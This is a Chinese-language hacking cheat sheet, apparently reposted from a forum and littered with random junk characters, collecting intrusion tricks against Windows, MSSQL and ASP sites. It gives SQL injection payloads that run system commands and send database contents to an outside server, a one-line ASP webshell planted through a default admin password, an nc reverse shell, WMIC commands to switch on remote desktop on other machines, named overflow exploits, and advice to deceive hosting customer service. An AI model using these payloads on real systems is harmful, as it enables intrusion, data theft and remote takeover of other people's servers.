SA点数据库分离技术相关6 J: V: A9 ^0 Y
. g* p. L3 T; p! H
! J4 V9 Z0 l/ i, @
SA点数据库分离搞法+语句:
5 V' B/ W0 j% {% f0 Y( C, U, i" [3 I$ i
注射点不显错,执行下面三条语句页面都返回正常。8 h) s `# ~) T
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
0 b: o5 h. U/ x7 land 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
6 t3 U* t4 _' p+ \: @# o* B, oand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')9 k3 V" ?5 B" x. E
可以列目录,判断系统为2000,web与数据库分离" u G0 B8 c) h2 Y/ N: ]9 N
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
" L$ Q3 R( Q- T; B \# l在注射点上执行
7 h& P4 Y& ~8 b5 ?% bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
0 U2 i4 U, ^* w8 P页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
8 u5 q2 `8 y7 _- ^8 t, l" I2 f还有我用NC监听得其他端口都没有得到IP。
W1 a3 k' _% Q" F. e |- s/ B* |9 }' d; ]
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
6 y. S- K& L% o/ z, C6 W'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
]9 S4 ?1 z* u& r$ J/ y# w0 s, z& M
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--2 e" X) ~! T% M$ Q
; @9 D9 t6 V# q6 @! k8 z现在就猜想是不是数据库是内网而且不能连外网。. ]% B! `0 [ l/ Y4 S( i; y7 u
9 w" [8 v# a. _& `9 E
! U: \# T. P( k/ ^access导出txt文本代码
, ] g f6 B" v# D+ gSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
) W0 } x/ h, ^2 g6 R, j4 Q2 U9 ~ d. i
; f' {5 O1 l$ a9 [ H. L% H7 U
' c, k) Y; C. p2 ~3 V
自动跳转到指定网站代码头
$ n: v- q& a3 o: S<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>- ^; {7 z0 O! w6 K9 j0 i; M
2 n. n2 e$ \1 `9 q7 G. g2 ^* s& w1 t$ ~5 P
入侵java or jsp站点时默认配置文件路径:
* f' L9 `) Q1 L, N1 Y3 d& _\web-inf\web.xml$ {% ^# ?3 r( h6 d
tomcat下的配置文件位置:2 B/ u+ y' X; U
\conf\server.xml (前面加上tomcat路径)
) |4 E8 ?9 F8 s6 z* S* W' Z\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
$ Y1 Q. ~ J* L/ C- [
5 ~7 m2 q* {# u& @8 ~5 J1 `4 C E9 \* S P! g6 V0 A
7 G5 I3 d- d! ~3 z9 ^检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:) z8 l" p1 x/ _9 q; n K
-1%23. |3 M3 F G* G: U) X5 W" p* s
> : }8 t% X4 u# e8 ^
<
* ]* n( x) x ^9 N1'+or+'1'='10 \4 Z1 R2 T1 i; f4 b$ n
id=8%bf# u& y) ^. |* }! o. g1 G0 W- l( t
2 |& [; b* q( q* a1 `: A
全新注入点检测试法:( _4 S P, W4 f5 B) t: i$ }: c$ T
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
- `" |# i& ^+ i5 {9 y5 h S4 r0 o" J. r Z! F9 [1 i, N
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
: k9 U1 P! u) ]8 Z+ R) ^3 d9 k4 A, X! |5 s
搜索型注入判断方法: [3 } R8 f) x* P+ z! K2 A
北京%' and '1'='1' and '%'='
x8 c; f. ?! y北京%' and '1'='2' and '%'='
) H6 M5 U+ Y- j4 b9 \2 [. v) v H* }' b0 `/ z/ v
# H& ] Q2 | l$ n" e
COOKIES注入:; W; s9 b5 r+ C7 y3 [- P
9 w" l: c o1 z+ bjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
7 G; E8 R. C8 A; t# J0 C
# t$ C1 Z; Z3 A' {' T) C$ X' @2000专业版查看本地登录用户命令:! p, M( ?) B s1 @( m F! u
net config workstation
* Y& T+ {! v/ j/ C5 `
2 l% s2 _# Y" j' u H$ D0 [0 H
2003下查看ipsec配置和默认防火墙配置命令:- r8 c4 x5 O2 j5 q# C$ \
netsh firewall show config
6 m" W, Y$ Z2 H! ~1 I( j# G1 Fnetsh ipsec static show all: x: f& e! k! ?, {3 {# U: ?. k
, Y' l; E! `" J! c8 E) n; \2 C
不指派指定策略命令:9 s& C( h& g) _: v, A$ P. ]
netsh ipsec static set policy name=test assign=n (test是不指派的策略名); r! R" I" k/ q& T' g0 J
netsh ipsec static show policy all 显示策略名# O' q4 M" P4 ~
# F6 c) {' h: G$ |0 @! S
' `4 ?( F) ^8 B( t
猜管理员后台小技巧:
3 K6 d8 x1 a2 F* Y1 ?admin/left.asp
! | z! R0 a1 h) W* [$ Madmin/main.asp8 x7 {' h) J4 Y2 f" z/ n% ]/ O4 q0 [
admin/top.asp; R3 E) v( B" e" y) b2 v) S
admin/admin.asp
+ b. B: [& Z3 I% I会现出菜单导航,然后迅雷下载全部链接
4 g+ Z- t8 [& u9 X( d7 t5 ^2 [: D/ a
7 w( e) e9 L3 I. U, {, [# {社会工程学:
9 { b( v+ L: p8 O( t用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人" E. _ a: H4 u
然后去骗客服
5 ?- x& d" x4 b0 O8 z9 B0 j8 o) i0 R% G' S! u
- s6 x# s6 _, W' y# M, h
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: * _% d/ A8 a' j) b
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, : N. h* x) E* X9 q. u! y
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
' s, b% a9 {0 M) U5 o5 W, ^/ t! [8 O+ i+ u9 Y: V0 c% f+ \. W
, s4 x0 S5 h/ B8 W0 F1 r
, t$ G& V/ {: \- c F& b6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)4 q5 i- {8 L# F- e' U
5 |. A" {) m; T( a4 H4 b5 p
7 ^+ ]& D5 @) v$ r& ?/ ]
3 z1 t1 R+ Q9 q+ uCMD加密注册表位置4 J' K4 R% o! M- c$ Q
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
; X9 ^9 E% Y; aAutoRun8 M) s6 u7 F' q! \9 ?) U
+ F! `, D, U2 e. O, A(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
3 {* ^) E. w+ `+ _! A# BAutoRun
; {, k) M" _& V1 g) I5 P' M, k0 P2 x
0 L, B! |7 S3 C
! r# u) \; J% ~- f; o在找注入时搜索Hidden,把他改成test
! h8 T: J5 b" ?- N) ?) P, t/ \# v4 z+ X2 O4 G
" q5 |) a* X' V$ B; u+ d3 r7 R! l, J1 J* l$ ?: D: U1 P# C. e
mstsc /v:IP /console 5 p; j2 z- Y7 r8 [" K
3 E( ?% F) G! _4 d( W0 P |
( h7 T& x2 Z$ C5 v; p一句话开3389:6 ]; {6 I. f' Q1 M- k% \& F
) K5 L$ `- m& L- [4 a M8 V
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
' J- e7 G3 S) H% z开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
, U" l4 B0 J: |6 P- y; x
4 r& h% _* k4 k" `' `) m5 i9 O g- A5 @; y4 J
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:5 K2 Z9 }6 C0 x" t! o, L2 h
Insert into admin(user,pwd) values('test','test')
F1 r: `7 V0 {" ^1 W1 b5 k
# [$ @% L) n0 D3 T; u) M4 H& ~) f' D! D/ T1 J6 s/ B
NC反弹- Z0 N2 I3 O; }* M. N) ^( R5 R( k
先在本机执行: nc -vv -lp 监听的端口 (自己执行) - u9 y7 b4 a# D0 C% k& H; v8 ~; s
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
; n. v, {, |9 s& U; g, C5 h3 I
0 Z% ^& @% ?! V0 X8 C# m0 p9 V6 j2 W/ w/ f, k. L; W; a& X
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
' g' M5 ^7 X! v* M, E
7 r; R( \; k# G) k+ n, g. H* p有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
& t1 n) ~) h* @1 y例如:
) ?" D# Q, _9 X9 r, Nsubst k: d:\www\ 用d盘www目录替代k盘/ \% Q5 P) _9 c7 k
subst k: /d 解除K盘代替 |